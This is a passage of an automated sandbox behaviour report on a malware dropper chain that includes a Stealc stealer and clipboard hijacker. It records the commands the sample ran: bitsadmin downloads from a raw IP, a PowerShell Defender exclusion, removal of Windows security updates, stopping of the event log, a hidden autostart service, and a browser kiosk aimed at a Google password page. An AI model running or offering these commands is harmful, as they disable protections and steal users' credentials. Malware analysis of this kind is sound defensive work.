Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5072	ping.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1136	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
1136	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
1900	skotes.exe
1900	skotes.exe
4516	stories.tmp
4516	stories.tmp
4740	b107b900a0.exe
4740	b107b900a0.exe
2660	axplong.exe
2660	axplong.exe
3572	stealc_default2.exe
3572	stealc_default2.exe
4024	axplong.exe
4024	axplong.exe
684	skotes.exe
684	skotes.exe
4352	e6a62fc7c5.exe
4352	e6a62fc7c5.exe
1924	531cd8388c.exe
1924	531cd8388c.exe
2020	b489200d48.exe
2020	b489200d48.exe
3572	stealc_default2.exe
3572	stealc_default2.exe
1860	46c1facbb6.exe
1860	46c1facbb6.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
5208	a059e40180.exe
5208	a059e40180.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
5208	a059e40180.exe
5208	a059e40180.exe
5208	a059e40180.exe
5736	nSoft.exe
5736	nSoft.exe
5868	6c3a0fbc6f.exe
5868	6c3a0fbc6f.exe
5736	nSoft.exe
5736	nSoft.exe
5736	nSoft.exe
5736	nSoft.exe
5988	svchost.exe
5988	svchost.exe
5988	svchost.exe
5988	svchost.exe
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6104	newwork.tmp
6552	aa3d6bbb08.exe
6552	aa3d6bbb08.exe
6848	7b7ddf7558.exe
6848	7b7ddf7558.exe
2316	Office2024.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	4508	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	364	taskkill.exe
Token: SeDebugPrivilege	3752	taskkill.exe
Token: SeDebugPrivilege	1308	firefox.exe
Token: SeDebugPrivilege	1308	firefox.exe
Token: SeDebugPrivilege	5208	a059e40180.exe
Token: SeDebugPrivilege	6024	powershell.exe
Token: SeShutdownPrivilege	6708	powercfg.exe
Token: SeCreatePagefilePrivilege	6708	powercfg.exe
Token: SeShutdownPrivilege	6736	powercfg.exe
Token: SeCreatePagefilePrivilege	6736	powercfg.exe
Token: SeShutdownPrivilege	6716	powercfg.exe
Token: SeCreatePagefilePrivilege	6716	powercfg.exe
Token: SeShutdownPrivilege	6724	powercfg.exe
Token: SeCreatePagefilePrivilege	6724	powercfg.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeShutdownPrivilege	2168	powercfg.exe
Token: SeCreatePagefilePrivilege	2168	powercfg.exe
Token: SeLockMemoryPrivilege	3376	cmd.exe
Token: SeShutdownPrivilege	7008	powercfg.exe
Token: SeCreatePagefilePrivilege	7008	powercfg.exe
Token: SeShutdownPrivilege	7020	powercfg.exe
Token: SeCreatePagefilePrivilege	7020	powercfg.exe
Token: SeShutdownPrivilege	7016	powercfg.exe
Token: SeCreatePagefilePrivilege	7016	powercfg.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1136	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
4516	stories.tmp
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
6104	newwork.tmp

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
1308	firefox.exe
2280	2d898dd098.exe
2280	2d898dd098.exe
2280	2d898dd098.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1308	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1136 wrote to memory of 1900	1136	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe	83
PID 1136 wrote to memory of 1900	1136	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe	83
PID 1136 wrote to memory of 1900	1136	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe	83
PID 1900 wrote to memory of 4552	1900	skotes.exe	85
PID 1900 wrote to memory of 4552	1900	skotes.exe	85
PID 1900 wrote to memory of 4552	1900	skotes.exe	85
PID 4552 wrote to memory of 4516	4552	stories.exe	86
PID 4552 wrote to memory of 4516	4552	stories.exe	86
PID 4552 wrote to memory of 4516	4552	stories.exe	86
PID 4516 wrote to memory of 4660	4516	stories.tmp	87
PID 4516 wrote to memory of 4660	4516	stories.tmp	87
PID 4516 wrote to memory of 4660	4516	stories.tmp	87
PID 4516 wrote to memory of 2964	4516	stories.tmp	89
PID 4516 wrote to memory of 2964	4516	stories.tmp	89
PID 4516 wrote to memory of 2964	4516	stories.tmp	89
PID 4660 wrote to memory of 4360	4660	net.exe	90
PID 4660 wrote to memory of 4360	4660	net.exe	90
PID 4660 wrote to memory of 4360	4660	net.exe	90
PID 1900 wrote to memory of 2184	1900	skotes.exe	98
PID 1900 wrote to memory of 2184	1900	skotes.exe	98
PID 1900 wrote to memory of 2184	1900	skotes.exe	98
PID 1900 wrote to memory of 4740	1900	skotes.exe	106
PID 1900 wrote to memory of 4740	1900	skotes.exe	106
PID 1900 wrote to memory of 4740	1900	skotes.exe	106
PID 4740 wrote to memory of 2660	4740	b107b900a0.exe	110
PID 4740 wrote to memory of 2660	4740	b107b900a0.exe	110
PID 4740 wrote to memory of 2660	4740	b107b900a0.exe	110
PID 1900 wrote to memory of 1488	1900	skotes.exe	111
PID 1900 wrote to memory of 1488	1900	skotes.exe	111
PID 1900 wrote to memory of 1488	1900	skotes.exe	111
PID 1488 wrote to memory of 5072	1488	0DMNix3.exe	112
PID 1488 wrote to memory of 5072	1488	0DMNix3.exe	112
PID 1488 wrote to memory of 5072	1488	0DMNix3.exe	112
PID 1488 wrote to memory of 2968	1488	0DMNix3.exe	114
PID 1488 wrote to memory of 2968	1488	0DMNix3.exe	114
PID 1488 wrote to memory of 2968	1488	0DMNix3.exe	114
PID 2660 wrote to memory of 3572	2660	axplong.exe	118
PID 2660 wrote to memory of 3572	2660	axplong.exe	118
PID 2660 wrote to memory of 3572	2660	axplong.exe	118
PID 2660 wrote to memory of 2908	2660	axplong.exe	119
PID 2660 wrote to memory of 2908	2660	axplong.exe	119
PID 2660 wrote to memory of 2908	2660	axplong.exe	119
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 2908 wrote to memory of 3492	2908	alex2022.exe	121
PID 1900 wrote to memory of 4352	1900	skotes.exe	123
PID 1900 wrote to memory of 4352	1900	skotes.exe	123
PID 1900 wrote to memory of 4352	1900	skotes.exe	123
PID 2660 wrote to memory of 1924	2660	axplong.exe	127
PID 2660 wrote to memory of 1924	2660	axplong.exe	127
PID 2660 wrote to memory of 1924	2660	axplong.exe	127
PID 2660 wrote to memory of 4672	2660	axplong.exe	129
PID 2660 wrote to memory of 4672	2660	axplong.exe	129
PID 2660 wrote to memory of 4672	2660	axplong.exe	129
PID 1900 wrote to memory of 2020	1900	skotes.exe	130
PID 1900 wrote to memory of 2020	1900	skotes.exe	130
PID 1900 wrote to memory of 2020	1900	skotes.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2540
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5988

C:\Users\Admin\AppData\Local\Temp\4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
"C:\Users\Admin\AppData\Local\Temp\4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1136
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
    "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Users\Admin\AppData\Local\Temp\is-FD8BV.tmp\stories.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-FD8BV.tmp\stories.tmp" /SL5="$602BE,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4516
    - - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause video_jet_1235
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4660
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause video_jet_1235
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4360
    - - C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe
        
        "C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\ReUploaded_MrAnon.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2184
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 348
      4⤵
      Program crash
      PID:1700
- - C:\Users\Admin\AppData\Local\Temp\1011459001\b107b900a0.exe
    "C:\Users\Admin\AppData\Local\Temp\1011459001\b107b900a0.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4740
  - - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2660
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3572
    - - C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2908
      - C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3492
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 1280
        7⤵
        Program crash
        
        PID:3024
    - - C:\Users\Admin\AppData\Local\Temp\1002824001\531cd8388c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1002824001\531cd8388c.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1924
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1496
        6⤵
        Program crash
        
        PID:876
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1476
        6⤵
        Program crash
        
        PID:364
    - - C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4672
      - C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1944
        
        C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2316
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:6280
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:6336
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:6284
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:6324
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:5760
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        8⤵
        Launches sc.exe
        
        PID:6816
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        Launches sc.exe
        
        PID:6660
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        8⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:6708
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        8⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:6716
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        8⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:6724
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        8⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:6736
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "QKJNEQWA"
        8⤵
        Launches sc.exe
        
        PID:6764
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
        8⤵
        Launches sc.exe
        
        PID:7100
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:2564
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "QKJNEQWA"
        8⤵
        Launches sc.exe
        
        PID:1804
    - - C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1052
    - - C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3776
      - C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:428
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
        7⤵
        Blocklisted process makes network request
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5856
    - - C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5736
    - - C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1012
      - C:\Users\Admin\AppData\Local\Temp\is-LDTKF.tmp\newwork.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LDTKF.tmp\newwork.tmp" /SL5="$1602B6,3278395,54272,C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:6104
    - - C:\Users\Admin\AppData\Local\Temp\1005208001\aa3d6bbb08.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005208001\aa3d6bbb08.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6552
    - - C:\Users\Admin\AppData\Local\Temp\1005209001\7b7ddf7558.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005209001\7b7ddf7558.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6848
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1516
        6⤵
        Program crash
        
        PID:5716
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1536
        6⤵
        Program crash
        
        PID:5728
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1584
        6⤵
        Program crash
        
        PID:5772
- - C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe
    "C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\SysWOW64\ping.exe
      ping -n 1 8.8.8.8
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5072
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:2968
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolwx.rar" "C:\Users\Admin\AppData\Local\Temp\jstsolwx.rar"
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:5404
- - C:\Users\Admin\AppData\Local\Temp\1011747001\e6a62fc7c5.exe
    "C:\Users\Admin\AppData\Local\Temp\1011747001\e6a62fc7c5.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4352
- - C:\Users\Admin\AppData\Local\Temp\1011748001\b489200d48.exe
    "C:\Users\Admin\AppData\Local\Temp\1011748001\b489200d48.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2020
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 1536
      4⤵
      Program crash
      PID:996
- - C:\Users\Admin\AppData\Local\Temp\1011749001\46c1facbb6.exe
    "C:\Users\Admin\AppData\Local\Temp\1011749001\46c1facbb6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1860
- - C:\Users\Admin\AppData\Local\Temp\1011750001\2d898dd098.exe
    "C:\Users\Admin\AppData\Local\Temp\1011750001\2d898dd098.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2280
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4508
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:364
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3752
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:996
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
